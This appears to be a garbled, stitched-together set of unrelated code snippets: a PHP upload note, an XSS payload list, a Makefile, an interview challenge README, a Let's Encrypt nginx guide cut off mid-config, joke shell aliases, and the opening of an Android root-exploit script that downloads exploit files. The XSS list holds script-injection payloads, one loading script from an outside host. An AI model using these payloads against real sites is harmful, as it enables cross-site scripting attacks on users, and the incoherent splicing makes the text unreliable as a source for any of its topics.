When uploading multiple files, the $_FILES
variable is created in the form:
Array
(
[name] => Array
(
[0] => foo.txt
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
fresh: clean chart | |
chart: instance_ages | |
@echo "AWS EC2 Instance Age Report" | |
@echo "---------------------------" | |
@echo "Days\\tCount" | |
@cat instance_ages | ./chart.py -n | |
clean: | |
rm -f instance* |
ASAPP DevOps and Systems Engineering Challenge | |
============================================== | |
v0.1 | |
Welcome to your challenge project! | |
You have two timeline options. If you live outside of NY and would have to fly in for your onsite, we strongly prefer that you take option 1. If coming in to the office is easy for you, then whichever you prefer is great. | |
Option 1: Code at home, half-day at ASAPP |
Prerequisites : the letsencrypt CLI tool
This method allows your to generate and renew your Lets Encrypt certificates with 1 command. This is easily automatable to renew each 60 days, as advised.
You need nginx to answer on port 80 on all the domains you want a certificate for. Then you need to serve the challenge used by letsencrypt on /.well-known/acme-challenge
.
Then we invoke the letsencrypt command, telling the tool to write the challenge files in the directory we used as a root in the nginx configuration.
I redirect all HTTP requests on HTTPS, so my nginx config looks like :
server {
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
"C:\Program Files\Neo4j Community\jre\bin\java" -cp "C:\Program Files\Neo4j Community\bin\neo4j-desktop-3.0.2.jar" \ | |
org.neo4j.tooling.ImportTool %* |
alias accio=wget | |
alias avadaKedavra='rm -f' | |
alias imperio=sudo | |
alias priorIncantato='echo `history |tail -n2 |head -n1` | sed "s/[0-9]* //"' | |
alias stupefy='sleep 5' | |
alias wingardiumLeviosa=mv | |
alias sonorus='set -v' | |
alias quietus='set +v' |
# | |
# Ethereum and eth-dev-tools: Debian 8 | |
# | |
# rev 9 | |
# | |
# started midsummer 2016-06-21 Andreas Krueger | |
# https://github.com/drandreaskrueger | |
# https://twitter.com/drandreaskruger | |
# please contact me with improvements, thanks. | |
# |
#!/bin/bash | |
# Give the usual warning. | |
clear; | |
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
sleep 10; | |
clear; | |
# Download and extract exploit files. | |
echo "[INFO] Downloading exploit files from GitHub..."; |